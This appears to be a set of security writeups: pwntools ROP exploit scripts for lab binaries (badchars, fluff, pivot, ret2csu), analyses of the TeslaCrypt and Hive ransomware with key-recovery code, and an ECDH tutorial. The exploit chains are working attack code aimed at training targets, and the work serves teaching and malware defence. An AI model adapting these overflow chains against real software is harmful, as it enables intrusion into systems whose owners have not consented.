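A small helper makes this kind of problem easy to spot before sending a payload. The sketch below uses only the standard library; the helper name has_badchars is my own, and the candidate addresses are the ones discussed in this writeup. It checks both the XOR-encoded string and every address that has to appear in the chain.

```python
import struct

BAD_CHARS = b"xga."

def has_badchars(value):
    # True if the little-endian 8-byte encoding of value contains a forbidden byte.
    return any(byte in BAD_CHARS for byte in struct.pack("<Q", value))

# The XOR-encoded string must itself be free of bad characters.
encoded = bytes(byte ^ 0xff for byte in b"flag.txt")
print("encoded string clean:", not any(byte in BAD_CHARS for byte in encoded))

# Every per-byte address in the deobfuscation loop must be clean as well.
for start in (0x601028, 0x601030, 0x601038):
    dirty = [hex(addr) for addr in range(start, start + 8) if has_badchars(addr)]
    print(hex(start), "bad addresses:", dirty)
```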
For the final script, we need to write the obfuscated flag.txt to memory, XOR each byte with 0xff to restore it, then pass it as an argument to print_file().
from pwn import *
pop_r12 = 0x40069c # pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
mov_r13 = 0x400634 # mov qword ptr [r13], r12 ; ret
pop_r15 = 0x4006a2 # pop r15; ret
xor_data = 0x400628 # xor byte ptr [r15], r14b ; ret
pop_rdi = 0x4006a3 # pop rdi; ret
data_addr = 0x601030 # writable target address; 0x601030-0x601037 contain no bad-character bytes
print_file = 0x400620 # call print_file
xor_flag_txt = xor(b'flag.txt', b'\xff')
chal = process("./badchars")
deobfuscate_flag = b''
for addr in range(data_addr, data_addr + 8):
    deobfuscate_flag += p64(pop_r15)
    deobfuscate_flag += p64(addr)
    deobfuscate_flag += p64(xor_data)
write_flag_txt = b'a'*40 + p64(pop_r12) + xor_flag_txt + p64(data_addr) + p64(0xff) + p64(data_addr) + p64(mov_r13)
call_print = p64(pop_rdi) + p64(data_addr) + p64(print_file)
send_str = write_flag_txt + deobfuscate_flag + call_print
f = open('fake_stdin','wb')
f.write(send_str)
f.close()
Up to this point, the challenge binaries have included “useful gadgets” that do exactly what we need, which isn’t very realistic. For this challenge, we are instead provided with a set of “questionable gadgets” that may be helpful, but we’ll have to be more creative in how we use them.
We need to find some way to write the flag.txt string. There aren’t many gadgets that let us store data into memory, so we’ll have to work backwards from the few gadgets we have. The gadget add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret looks promising, since we also have pop rbp ; ret. This means that we can choose an arbitrary address and add the value in ebx to it. If we choose an address that we know will contain all zeroes, this is the same as writing the value in ebx to the address.
This is where the “questionable gadgets” come in. If we pop the correct values into rcx and rdx, then the instruction bextr rbx, rcx, rdx allows us to write to rbx.
Felix Cloutier’s description of the bextr instruction tells us that it does the following:
Extracts contiguous bits from the first source operand (the second operand) using an index value and length value specified in the second source operand (the third operand). Bit 7:0 of the second source operand specifies the starting bit position of bit extraction. A START value exceeding the operand size will not extract any bits from the second source operand. Bit 15:8 of the second source operand specifies the maximum number of bits (LENGTH) beginning at the START position to extract.
In our case, the destination register is rbx
. With the right choice of values in rcx
and rdx
, we can write an arbitrary value to rbx
. The first source operand (rcx
) should contain the value that we want to write to rbx
. The second source operand (rdx
) should contain the value 0 in bits 7:0 (to specify that we’re starting the extraction at position 0) and the value 64 in bits 15:8 (to specify that we want to extract all 64 bits).
Note that our gadget adds 0x3ef2
to rcx
before performing the bextr
operation. To correct for this, we can simply subtract 0x3ef2
from our desired value before passing it in.
We have now found a way to write to memory. We can use bextr
to write to rbx, then write that value to memory with the add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
gadget. From there, the solution proceeds in the same way as the write4
challenge.
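To sanity-check the reasoning above, the two gadgets can be modelled in a few lines of Python. This is a rough emulation under stated assumptions, not a disassembly of the binary: the function names are hypothetical, the bytearray stands in for a zeroed region of memory, and only the behaviour described in the text (the 0x3ef2 adjustment, the bextr control word, and the 32-bit add) is modelled.

```python
MASK64 = (1 << 64) - 1
MASK32 = (1 << 32) - 1

def bextr64(src, control):
    """Emulate BEXTR on 64-bit operands: extract `length` bits of src starting at `start`."""
    start = control & 0xff           # bits 7:0 of the control operand
    length = (control >> 8) & 0xff   # bits 15:8 of the control operand
    if start >= 64:
        return 0
    return (src >> start) & ((1 << length) - 1) & MASK64

def bextr_gadget(rcx, rdx):
    """Model the gadget: add rcx, 0x3ef2 ; bextr rbx, rcx, rdx. Returns rbx."""
    rcx = (rcx + 0x3ef2) & MASK64
    return bextr64(rcx, rdx)

def add_dword(memory, offset, ebx):
    """Model `add dword ptr [addr], ebx` on a little-endian byte buffer."""
    current = int.from_bytes(memory[offset:offset + 4], "little")
    memory[offset:offset + 4] = ((current + ebx) & MASK32).to_bytes(4, "little")

memory = bytearray(8)      # stands in for a zeroed region of .data
control = 64 << 8          # start = 0 in bits 7:0, length = 64 in bits 15:8
for offset, chunk in ((0, b"flag"), (4, b".txt")):
    wanted = int.from_bytes(chunk, "little")
    rbx = bextr_gadget(wanted - 0x3ef2, control)   # pre-subtract the gadget's adjustment
    add_dword(memory, offset, rbx & MASK32)        # adding to zero is the same as writing

print(bytes(memory))
```

Because the destination starts out as zeroes, each add behaves like a 32-bit store, which is why two writes are enough for the eight-byte string.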
Solve script:
from pwn import *
bextr_addr = 0x40062a
pop_rdi = 0x4006a3 # pop rdi ; ret
pop_rbp = 0x400588 # pop rbp ; ret
add_rbp = 0x4005e8 # add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
data_addr = 0x601028
print_file = 0x400620
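def write_value(value, data_addr):
    payload = p64(pop_rdi) + p64(data_addr)
    # use bextr to get value into rbx: the control word (start 0, length 64) goes into rdx,
    # and the value, pre-adjusted for the 0x3ef2 that the gadget adds, goes into rcx
    payload += p64(bextr_addr) + p64(64 << 8) + p64(int.from_bytes(value, 'little') - 0x3ef2)
    # point rbp - 0x3d at the destination, then add ebx into the zeroed memory there
    payload += p64(pop_rbp) + p64(data_addr + 0x3d)
    payload += p64(add_rbp)
    return payload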
chal = process("./fluff")
send_str = b'a'*40
send_str += write_value(b'flag', data_addr)
send_str += write_value(b'.txt', data_addr+4) # we can only write 32 bits at a time, so we need 2 writes
send_str += p64(pop_rdi) + p64(data_addr) + p64(print_file)
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
In this challenge, we need to call a library function that is not imported. The ret2win
function is located in libpivot.so
at offset 0xa81
:
ret2win
is not imported, but another function called foothold_function
is. Its offset is 0x96a
:
We do not know where ret2win
will be loaded into memory, but we know that its offset is 0xa81 - 0x96a = 0x117
from foothold_function
.
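The offset arithmetic can be written out as a short sketch. The leaked address below is a made-up value used only for illustration (the real one changes between runs), and the function name is hypothetical.

```python
FOOTHOLD_OFFSET = 0x96a   # offset of foothold_function in libpivot.so
RET2WIN_OFFSET = 0xa81    # offset of ret2win in libpivot.so

def ret2win_address(foothold_runtime_addr):
    """Compute where ret2win lives, given the resolved address of foothold_function."""
    return foothold_runtime_addr + (RET2WIN_OFFSET - FOOTHOLD_OFFSET)

# Hypothetical resolved address of foothold_function; only its low bits are meaningful here.
leaked_foothold = 0x7ffff7c0096a
print(hex(RET2WIN_OFFSET - FOOTHOLD_OFFSET), hex(ret2win_address(leaked_foothold)))
```

The distance between two functions in the same shared library does not depend on where the library is loaded, so the same constant works on every run.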
In addition, the pwnme
function is different from the previous challenge. We are given a very limited amount of space on the stack for our chain, but we have a separate write to 0x100 bytes of memory on the heap. Normally, we would likely have to find some way to leak the address of this heap memory, but in this case the challenge helpfully prints it out.
The chain at the pivot address will contain most of what we need to do. The buffer overflow on the stack will only be used to overwrite the original stack pointer with the address of the pivot.
The “useful gadgets” allow us to do exactly that: we can pop the location of the pivot into rax
, then exchange the value of rax
with that of rsp
. With the pivot address in rsp
, we can continue the chain from there.
We now need to call ret2win
. Since we know the offset of ret2win
relative to foothold_function
, we will start by calling foothold_function
in order to resolve its .got.plt
entry. We first pop the pointer to the .got.plt
entry into rax
, then use the gadget mov rax, qword ptr [rax] ; ret
to get the value at that entry.
We can then add the offset to the address of foothold_function
in order to obtain the address of ret2win
. We can pop the offset into rbp
and use the gadget add rax, rbp ; ret
to add them. The last part of the chain is jmp rax
, which takes us to ret2win
.
Final script:
from pwn import *
chal = process("./pivot")
# write to pivot address
foothold_call = 0x400720
pop_rbp = 0x4007c8 # pop rbp ; ret
pop_rax = 0x4009bb # pop rax; ret
jmp_rax = 0x4007c1 # jmp rax
read_rax_addr = 0x4009c0 # mov rax, qword ptr [rax] ; ret
add_rax_rbp = 0x4009c4 # add rax, rbp ; ret
foothold_ptr = 0x601040
offset = 0xa81 - 0x96a
pivot_chain = b''
pivot_chain += p64(foothold_call)
pivot_chain += p64(pop_rbp) + p64(offset)
pivot_chain += p64(pop_rax) + p64(foothold_ptr)
pivot_chain += p64(read_rax_addr)
pivot_chain += p64(add_rax_rbp)
pivot_chain += p64(jmp_rax)
chal.recvuntil(b'pivot: ')
pivot_addr = int(chal.recv(numb=14), 16)
chal.recvuntil(b'>')
chal.sendline(pivot_chain)
# write to stack
xchg_rsp = 0x4009bd # xchg rsp, rax ; ret
stack_chain = b'a'*40 + p64(pop_rax) + p64(pivot_addr) + p64(xchg_rsp)
chal.recvuntil(b'>')
chal.sendline(stack_chain)
print(chal.recvall())
This challenge requires us to call a function with three arguments like callme
, but this time there is no longer a convenient way to get data into rdx
. We will need to use a more convoluted method known as ret2csu
.
As the name suggests, we’re going to be using two gadgets in the __libc_csu_init()
function. The advantage of this strategy is that the __libc_csu_init()
function is present in most C binaries compiled for Linux on x86_64 with older toolchains (binaries built against glibc 2.34 or later no longer include it), so we can use it in many different attacks.
There are two main gadgets in __libc_csu_init()
that we will be using for this chain. The first pops values into rbx
, rbp
, r12
, r13
, r14
, and r15
:
And the second moves values to rdx
, rsi
, and edi
from r15
, r14
, and r13
, respectively:
We can chain these two gadgets together in order to write arbitrary values to rdx
and rsi
. The second gadget ends in a call
, but we can choose the address that is called because the first gadget lets us write arbitrary values to rbx
and r12
. In order to resume our chain after the call, we want to call a gadget of the form pop; ret
.
However, the call address is passed via a pointer in [r12+rbx*8]
, so if we want to call anything, we need a pointer to it first. I looked at several different existing pointers to executable code, but nothing looked suitable for what I needed. Instead, I found a way to write a pointer to a pop rbp; ret
gadget to the .data
section. There were no mov
instructions that I could use for this, so I instead used the gadget add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
to write to an area in memory that I knew would contain all zeroes. (This is definitely not the only possible approach for this part of the challenge, so I also recommend looking at other writeups to see how they handled it.)
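As a small illustration of the address calculation, the sketch below splits the address of the stored pointer into values for rbx and r12 so that r12 + rbx*8 lands on it. The helper names are hypothetical, and 0x601028 is simply the .data address used in the script.

```python
def csu_call_registers(pointer_addr):
    """Split a pointer address into (rbx, r12) so that r12 + rbx*8 == pointer_addr."""
    rbx, r12 = divmod(pointer_addr, 8)
    return rbx, r12

def effective_address(rbx, r12):
    """Address that `call qword ptr [r12 + rbx*8]` dereferences."""
    return r12 + rbx * 8

pointer_addr = 0x601028   # where the pointer to the pop/ret gadget is stored
rbx, r12 = csu_call_registers(pointer_addr)
print(hex(rbx), hex(r12), hex(effective_address(rbx, r12)))
```

Setting rbx to 0 and r12 to the pointer address would satisfy the same equation; any pair that sums to the right address works.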
Once the call
instruction is handled correctly, the two gadgets in __libc_csu_init()
can be chained together to perform writes to rdx
and rsi
. These gadgets also allow a write to edi
, but ret2win
requires a 64-bit argument, so we need to write to rdi
separately. Fortunately, the binary contains a pop rdi; ret
gadget, so this is easy. With all three arguments written, we can then call ret2win
from its .plt
entry.
Final script:
from pwn import *
arg1 = 0xdeadbeefdeadbeef
arg2 = 0xcafebabecafebabe
arg3 = 0xd00df00dd00df00d
pop_rdi = 0x4006a3 # pop rdi ; ret
pop_rsi = 0x4006a1 # pop rsi ; pop r15 ; ret
mov_rdx_and_call = 0x400680
pop_ret_ptr = 0x601028
pop_rbx_rbp_r12 = 0x40069a
add_rbp = 0x4005e8 # add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
pop_rbp = 0x400588 # pop rbp ; ret
ret2win = 0x400510
ret = 0x4006a4
send_str = b'a'*40 + p64(ret)
send_str += p64(pop_rbx_rbp_r12) + p64(pop_rbp) + b'a'*40
send_str += p64(pop_rbp) + p64(pop_ret_ptr + 0x3d)
send_str += p64(add_rbp)
send_str += p64(pop_rbx_rbp_r12) + p64(pop_ret_ptr // 8) + b'a'*8 + p64(pop_ret_ptr % 8) + p64(arg1) + p64(arg2) + p64(arg3)
send_str += p64(mov_rdx_and_call)
send_str += p64(pop_rdi) + p64(arg1)
send_str += p64(ret2win)
chal = process('./ret2csu')
f = open('fake_stdin','wb')
f.write(send_str)
f.close()
print(chal.recvuntil(b'>'))
chal.sendline(send_str)
print(chal.recvall())
TeslaCrypt was a ransomware strain from 2015. It targeted home users and demanded a ransom of about $500. I looked at the second version of this ransomware, which had a vulnerability in the implementation of its cryptography.
The sample I looked at contained strings relating to the program DVD-Cloner, indicating that this malware spread by impersonating legitimate binaries.
We can also see that the program contains a section with very high entropy, indicating that the ransomware payload is encrypted. The easiest way to dump the decrypted program is to set a breakpoint at VirtualProtect
and look at the address that is marked as executable.
The first time the program is run, it moves itself to %APPDATA%
and saves itself under a random name. After this, the program exits, but it creates a new process with another copy of itself. Attaching the debugger to this process, we find that this copy of the ransomware is actually responsible for performing the encryption.
Once the files are encrypted, the extension .zzz
is appended, and ransom notes called help_restore_files_[random extension].txt
and help_restore_files_[random extension].html
are dropped in each directory. The ransom note claims that it is CryptoWall 3.0 and that RSA-2048 was used in the encryption, neither of which is true.
The program uses the open-source cryptography libraries from OpenSSL to perform the encryption. Specifically, it uses the bn
library to handle arbitrarily large numbers and the ec
library to perform encryption based on elliptic curves. In fact, the program contains strings that reveal many of the specific .c files that are in use, making it relatively straightforward to match functions in the decompiled code to functions in the OpenSSL libraries.
TeslaCrypt uses 256-bit AES encryption in CBC mode. A random key is generated for each victim, and a random initialization vector is generated for each encrypted file. The initialization vector is saved to a header at the beginning of the encrypted file, and the AES key is encrypted using a scheme based on the Elliptic Curve Diffie-Hellman key exchange algorithm.
To encrypt the random AES key, the program uses a variation of the Elliptic Curve Diffie-Hellman algorithm. This was my first serious look at elliptic curve cryptography, so I’ve made a separate blog post with a brief overview of how ECDH works. If you’re unfamiliar with ECDH, you can find the writeup here.
The program randomly generates two public/private ECDH keypairs. The first of these keys is used as a master key that can be used to decrypt any file on the victim’s system; the second encrypts the AES key and might vary across different files. For the remainder of this writeup, I’ll be referring to these keys as the “Round 1 key” and the “Round 2 key.”
The program performs two ECDH key exchanges. The first key exchange uses a hard-coded public key and the Round 1 private key. The second key exchange uses the Round 1 public key and the Round 2 private key (which is also the AES key).
The hard-coded public key is the point
x = 0x8f28211163feb956ef1d50d9dc7917e3ae6dac2812cb534f7490a1bee72e0d21
y = 0xff10f31537a476feef8080cfb27a7ce5833b3b16765390a5e756f30b276f6c4a
After the AES encryption, the program writes the following values to the file header:
The program sends out an AES-encrypted HTTP request to the C2 server containing the Round 1 private key. The hex string in this request is encrypted using the hard-coded key
C4 DC B2 0E 93 65 6A 2D 90 BF 85 1F DD B1 16 2B D4 F8 E9 F6 E7 F5 A8 2A 31 1D 40 68 92 6B D5 72
and initialization vector
DE AD BE EF 00 00 BE EF DE AD 00 00 BE EF DE AD
Once we decrypt the HTTP request, there are a few interesting fields. key
is the private key, and addr
is a Bitcoin wallet address. ip
is the victim’s IP address retrieved from ipinfo.io
, though it is malformed in the screenshot above because I did not recreate the ipinfo.io
site on my simulated network. gate
is always G1
, and I’m unsure what it refers to. Finally, inst_id
is the victim ID given in the ransom note.
If this request were to be intercepted, it would be possible to use the hard-coded AES key to decrypt the request and retrieve the key. However, TeslaCrypt’s primary targets were home users, who are unlikely to be logging any requests.
In order to ensure that the same Round 1 keypair is always used, the program creates a registry key under HKCU\Software\[victim ID number]
. The key contains the value of the Round 1 public key, the first product, a Bitcoin wallet address, and the time of encryption. If this registry key is present, the program reads these values and reuses them rather than generating a new Round 1 keypair. However, even if the registry key is present, the program will still generate a new AES key if it is stopped and run again.
Based on the HTTP request, we know that the creator of the ransomware has the Round 1 private key. They could then perform ECDH key exchange between the Round 1 private key and the Round 2 public key. Dividing the second product by the result of this key exchange, they can rederive the AES key and decrypt the files.
The following script reimplements this algorithm:
def retrieve_values(priv, pub1, pub2, prod1, prod2):
    hc_x = 0x8f28211163feb956ef1d50d9dc7917e3ae6dac2812cb534f7490a1bee72e0d21
    hc_y = 0xff10f31537a476feef8080cfb27a7ce5833b3b16765390a5e756f30b276f6c4a
    hc = Point(hc_x, hc_y)
    test_pub = secp256k1.double_and_add(secp256k1.G, priv)
    if(test_pub != pub1):
        print("failure on first public key:", test_pub)
        return
    ecdh1 = secp256k1.ecdh(hc, priv)
    print("ecdh 1 result:", hex(ecdh1))
    if(prod1 % ecdh1 == 0):
        next = prod1 // ecdh1
    else:
        print("failure on first ecdh:", hex(ecdh1))
        return
    ecdh2 = secp256k1.ecdh(pub2, priv)
    print("ecdh 2 result:", hex(ecdh2))
    if(prod2 % ecdh2 == 0):
        aes = prod2 // ecdh2
        print("successfully recovered aes key:", hex(aes))
        return
    else:
        print("failure on second ecdh:", hex(ecdh2))
        return
The flaw in the encryption comes from the product of the private key with the ECDH key exchange result. The product is a 512-bit number, and neither the private key nor the ECDH result will be prime most of the time. This means that it’s possible to factor it and retrieve the private key.
I initially dismissed this method, as I thought that most keys would end up having large factors that would be difficult to find in a reasonable amount of time. However, I later found out that this is exactly how TeslaCrypt was originally broken. Knowing this, I revisited the idea and was eventually able to use YAFU to factor a key.
For a test run, I factored the value
5AA8DFED3741DA01C0202D1359C3909BEE1570C5DA36505F1E76E362B2D65818CCD0E40E53FAF6F4FC1676B886E17759B454E0FA9D8EBD9EE8F8683DC0831DC7
which has a corresponding public key of
00 04 2F 9A 65 0A E2 F3 15 A4 40 45 59 19 48 70 F7 DC 9C AD AC 47 24 B0 2D B1 FD F5 F5 70 20 F5 74 11 20 E5 E9 88 F2 E8 67 A8 E3 00 78 4E E8 44 48 C4 2E E0 47 A3 48 B7 C2 BB 2E 90 59 2F D3 2C F9 3C
After a little over an hour, YAFU outputs the following factors:
***factors found***
P1 = 3
P1 = 3
P1 = 5
P1 = 7
P3 = 101
P3 = 773
P5 = 10837
P8 = 99807317
P25 = 1655126720228753303122051
P68 = 13781398374395757363311877843637355500151837520775480225177546547567
P43 = 7825723884698533506375783563522817813881993
ans = 1
From there, we need to figure out which of the divisors of this product is the correct private key. However, this is easy to do. The public key is given to us in the encrypted file header, so we can just generate the public key that goes with each private key candidate and see if it matches the given one:
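from itertools import combinations
def get_key_candidates(factors, pubkey):
    # try every non-empty subset of the prime factors as a candidate private key
    for i in range(1, len(factors) + 1):
        for subset in combinations(factors, i):
            prod = 1
            for fac in subset: prod *= fac
            if(secp256k1.double_and_add(secp256k1.G, prod) == pubkey):
                print(prod)
                print(subset)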
In this case, we recover the private key
86655516964165928432754623993726968327056923720817543761676186481982334307557 = 3 * 3 * 7 * 99807317 * 13781398374395757363311877843637355500151837520775480225177546547567
which we can then use to recover all encrypted AES keys and decrypt our files.
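The candidate search can also be sketched without any curve arithmetic, which makes it easier to see how few candidates there are. In the sketch below the names candidate_keys and find_key are hypothetical, the 256-bit size limit is an assumption based on the key size of secp256k1, and the matches callback is a stand-in for the real check that compares the candidate's public key against the one in the file header.

```python
from itertools import combinations
from math import prod

def candidate_keys(factors, max_bits=256):
    """Return the sorted, distinct products of non-empty subsets of `factors`
    that fit in max_bits bits."""
    seen = set()
    for size in range(1, len(factors) + 1):
        for subset in combinations(factors, size):
            value = prod(subset)
            if value.bit_length() <= max_bits:
                seen.add(value)
    return sorted(seen)

def find_key(factors, matches):
    """Return the first candidate accepted by `matches`, or None."""
    for candidate in candidate_keys(factors):
        if matches(candidate):
            return candidate
    return None

# Toy example: the "private key" is a divisor of a small product.
toy_private = 3 * 7 * 101
toy_factors = [3, 3, 5, 7, 101]
found = find_key(toy_factors, lambda k: k == toy_private)
print(len(candidate_keys(toy_factors)), found)
```

Collecting the products in a set removes the duplicates that arise from repeated prime factors, such as the two factors of 3 above. With eleven prime factors there are at most 2**11 subsets, so even a slow point multiplication per candidate finishes quickly.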
This writeup gives a brief overview of the ECDH algorithm, along with a simple Python implementation. I originally intended this to be part of my TeslaCrypt writeup, but it got long enough that I decided to make a separate post.
Much of what I explain here is described in more detail in the Wikipedia pages for elliptic curve cryptography and elliptic curve point multiplication, so I highly recommend reading through them if you’re interested in a more in-depth explanation.
An elliptic curve is a curve of the form y**2 = x**3 + ax + b
. For the purposes of elliptic curve cryptography, we will be considering an elliptic curve defined over a finite field.
We can define a group operation over a given elliptic curve in the following way: Consider two points, P and Q, on an elliptic curve. The line connecting those points intersects exactly one other point, R. We consider R to be the sum of P and Q.
In the case where P and Q are the same point, we obviously can’t draw a line connecting the points, so we instead take the tangent line to the curve at P. The point P + P is the point where the tangent line intersects the curve.
The identity element is defined as the “point at infinity”, which is not a point on the curve. If the line connecting two points on an elliptic curve is vertical, it does not intersect a third point on the curve, but we say that it intersects the point at infinity. Every point P has an inverse -P, which when added to P gives the point at infinity as a result.
Now that we have defined an addition operation over elliptic curves, we can also define scalar multiplication. To multiply a point P by a number k, we simply add P to itself k times.
Suppose we take an initial generator point G, then add it to itself k times to obtain a point kG. This scalar multiplication is easy to compute: if we know G and k, we can compute kG in O(log k) time using a variation of the repeated-squaring algorithm called “double and add”, which I’ll discuss later.
However, now suppose we don’t know k, but we only know G and kG. It turns out that there is no known polynomial-time algorithm to compute k using this information, making this a good basis for a cryptographic algorithm.
ECDH is a key exchange protocol that takes advantage of the difficulty of the elliptic curve discrete logarithm problem. For ECDH, we define a public/private keypair in the following way:
Choose an elliptic curve y**2 = x**3 + ax + b
, along with a prime modulus p. Additionally, choose a standard base point G. The parameters a, b, p, and G are public values that must be agreed upon in advance by both parties involved in the key exchange protocol.
Choose a private key k, which is a randomly chosen integer. The corresponding public key is the point kG.
Note that a, b, p, and G are part of neither the private key nor the public key: they are standard values used by everyone implementing the algorithm. Some curves are more secure than others, so it is a good idea to use a standard curve that has been verified to be cryptographically secure. For example, TeslaCrypt used the secure curve secp256k1
, the same curve used in Bitcoin. Its parameters are
a = 0
b = 7
p = 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f
G = (0x79be667ef9dcbbac55a06295ce870b07029bfcdb2dce28d959f2815b16f81798,
0x483ada7726a3c4655da4fbfc0e1108a8fd17b448a68554199c47d08ffb10d4b8)
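Suppose Alice and Bob each generate keypairs (A, AG) and (B, BG) respectively. The ECDH key exchange protocol allows them to use their keypairs to agree on a shared secret using the following steps:
Alice sends her public key AG to Bob, and Bob sends his public key BG to Alice.
Alice multiplies Bob’s public key by her private key to obtain A(BG) = ABG.
Bob multiplies Alice’s public key by his private key to obtain B(AG) = ABG.
Both parties now hold the same point ABG, which serves as the shared secret.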
Even if an attacker knew AG and BG, they would not be able to determine ABG. Since they do not know A or B, they would not be able to calculate ABG without solving the elliptic curve discrete logarithm problem.
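The exchange can be tried out on a toy curve. The sketch below is a minimal illustration under stated assumptions: the curve y**2 = x**3 + 2x + 2 over the integers mod 17 with base point (5, 1) is a small textbook example rather than anything used in practice, the private keys 3 and 7 are arbitrary, and points are plain tuples with None standing for the point at infinity. It requires Python 3.8 or later for the modular inverse via pow.

```python
# Toy curve y**2 = x**3 + 2x + 2 over the integers mod 17 (far too small for real use).
P_MOD, A_COEFF = 17, 2
G = (5, 1)          # base point on the toy curve
INFINITY = None     # the identity element

def add(p1, p2):
    """Add two points on the toy curve."""
    if p1 is INFINITY: return p2
    if p2 is INFINITY: return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P_MOD == 0:
        return INFINITY                      # P + (-P): the line is vertical
    if p1 == p2:
        slope = (3 * x1 * x1 + A_COEFF) * pow((2 * y1) % P_MOD, -1, P_MOD)
    else:
        slope = (y2 - y1) * pow((x2 - x1) % P_MOD, -1, P_MOD)
    x3 = (slope * slope - x1 - x2) % P_MOD
    y3 = (slope * (x1 - x3) - y1) % P_MOD
    return (x3, y3)

def multiply(k, point):
    """Compute k * point with double-and-add."""
    acc = INFINITY
    while k:
        if k & 1: acc = add(acc, point)
        point = add(point, point)
        k >>= 1
    return acc

alice_private, bob_private = 3, 7             # arbitrary example private keys
alice_public = multiply(alice_private, G)     # AG, sent to Bob
bob_public = multiply(bob_private, G)         # BG, sent to Alice

shared_alice = multiply(alice_private, bob_public)   # A(BG)
shared_bob = multiply(bob_private, alice_public)     # B(AG)
print(alice_public, bob_public, shared_alice, shared_bob)
```

Both sides arrive at the same point because scalar multiplication commutes: A(BG) and B(AG) are both (AB)G.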
A Python implementation of elliptic curve addition and scalar multiplication is given below.
The naive way to perform scalar multiplication would simply be to perform repeated addition, but a much faster approach is possible, analogous to the repeated-squaring method for modular exponentiation. This is known as the double-and-add method, and it is performed using the following steps:
Suppose we want to add a point P to itself n times. We first define three registers:
acc, to be used as an accumulator. Initialize this to the identity point.
curr, to store the current power-of-two multiple of P. Initialize this to P.
n, to store the binary representation of n.
For each bit of n, starting with the LSB and ending with the MSB:
If the bit is 1, add curr to acc.
Add curr to itself.
On step k of this process curr
contains (2**k)P
, as the point in curr
is doubled at each step. By the end of the process, acc
contains the point nP, which is what we are looking for.
class Point:
    def __init__(self, x, y, is_infty=False):
        if(is_infty):
            self.is_infty = True
            self.x = None
            self.y = None
        else:
            self.is_infty = False
            self.x = x
            self.y = y
    def __repr__(self):
        if(self.is_infty): return "point at infinity"
        return "x: " + hex(self.x) + "\n" + "y: " + hex(self.y)
    def __eq__(self, other):
        return (self.is_infty == other.is_infty and self.x == other.x and self.y == other.y)
    def __ne__(self, other):
        return not self.__eq__(other)
class Curve:
    def __init__(self, a, b, G, p):
        self.a = a
        self.b = b
        self.G = G
        self.p = p
    def add(self, point1, point2):
        # handle special case for point at infinity
        if(point2.is_infty): return point1
        if(point1.is_infty): return point2
        # P + (-P) is the point at infinity (this also covers doubling a point with y = 0)
        if(point1.x == point2.x and (point1.y + point2.y) % self.p == 0):
            return Point(None, None, True)
        if(point1 == point2):
            # calculate (3x_1**2 + a)/(2y_1) mod p
            l = (3 * pow(point1.x, 2, self.p) + self.a) * pow((2 * point1.y % self.p), -1, self.p)
        else:
            # calculate (y_2 - y_1)/ (x_2 - x_1) mod p
            l = ((point2.y - point1.y) % self.p) * pow(((point2.x - point1.x) % self.p), -1, self.p)
        x_res = (pow(l, 2, self.p) - point1.x - point2.x) % self.p
        y_res = (l * (point1.x - x_res) - point1.y) % self.p
        return Point(x_res, y_res)
    def double_and_add(self, point, n):
        acc = Point(None, None, True) #start at point at infinity
        curr = point
        while(n != 0):
            if(n & 1 == 1): acc = self.add(acc, curr)
            curr = self.add(curr, curr)
            n = n >> 1
        return acc
    def ecdh(self, pub, priv):
        # the shared secret is the x-coordinate of priv * pub
        return self.double_and_add(pub, priv).x
Hive is a ransomware program that first appeared in 2021. Unlike most ransomware, it uses a custom encryption algorithm, which makes it especially challenging to reverse. I’ll be analyzing the first version of Hive, which is written in Golang, though it has since been rewritten in Rust.
This sample was obtained from vx-underground, and its hash is 2f7d37c22e6199d1496f307c676223dda999c136ece4f2748975169b4a48afe5
.
Though the sample included symbols for all functions, Binary Ninja is not capable of analyzing Golang symbols by default. However, Mandiant has released a tool called GoReSym that reads symbols from Golang binaries. This tool produces a JSON file containing the names of both standard library and user-defined functions along with the virtual addresses where they appear.
With the symbols recovered, we can then import them into Binary Ninja with the following script.
import json
import binaryninja
from binaryninja.types import Symbol
from binaryninja.enums import SymbolType
def rename_syms(view):
    f = open('/home/remnux/.binaryninja/plugins/gosymtab/syms')
    table = json.load(f)
    for i in table["UserFunctions"]:
        start = i["Start"]
        name = i["FullName"]
        s = Symbol(SymbolType.FunctionSymbol, int(start), name)
        view.define_user_symbol(s)
    for i in table["StdFunctions"]:
        start = i["Start"]
        name = i["FullName"]
        s = Symbol(SymbolType.FunctionSymbol, int(start), name)
        view.define_user_symbol(s)
    for i in table["Types"]:
        va = i["VA"]
        name = i["Str"]
        s = Symbol(SymbolType.DataSymbol, int(va), name)
        view.define_user_symbol(s)
binaryninja.plugin.PluginCommand.register("GoReSym integration", "rename functions according to output of GoReSym tool", rename_syms)
With the symbols recovered, the program flow immediately becomes a lot more clear, as the sample uses descriptive names like EncryptFiles
and RemoveItself
.
The encryption algorithm used in this sample relies on a single “primary key”, which is generated by reading 0xa00000 random bytes from the crypto/rand.Read
function. As far as I know, Golang’s crypto/rand
functions are cryptographically secure, so we have no way to predict what will be generated in this step.
Once the primary key is generated, it is encrypted and exported to a file with extension .key.hive
. The name of the file is the base64 representation of the MD5 hash of the key.
The primary key is divided into blocks, with each block being encrypted by one of several RSA public keys in PKCS1 format. The keys are of varying size, and all of them use the public exponent 65537. The program uses the OAEP encryption scheme with a hash length of 256 for all keys.
There is a table of 100 of these RSA keys hard-coded into the file, and each one is used in order. Once all keys have been used, the program starts over from the beginning of the table.
The RSA-encrypted primary key appears to be the only content of the .key.hive
file.
Files are encrypted in blocks of length 0x1000, but a variable length of data is skipped over during encryption.
The length of these skipped segments is chosen differently depending on the size of the file to be encrypted.
The following script can be used to determine how many bytes are skipped:
def get_skip_length(file_length):
    if(file_length <= 0x2000): return 0
    if(file_length >= 0x20000):
        if(file_length >= 0x40000000): m = 1
        elif(file_length >= 0x6400000): m = 5
        elif(file_length >= 0xa00000): m = 10
        elif(file_length >= 0x100000): m = 20
        else: m = 30
        div_val = m * (file_length >> 0xc) // 100
    else: div_val = file_length >> 0xc
    return (file_length - (div_val << 0xc)) // (div_val - 1)
In some cases, the number of bytes skipped can be very large, especially for larger file sizes. It might be possible to take advantage of this to recover some data.
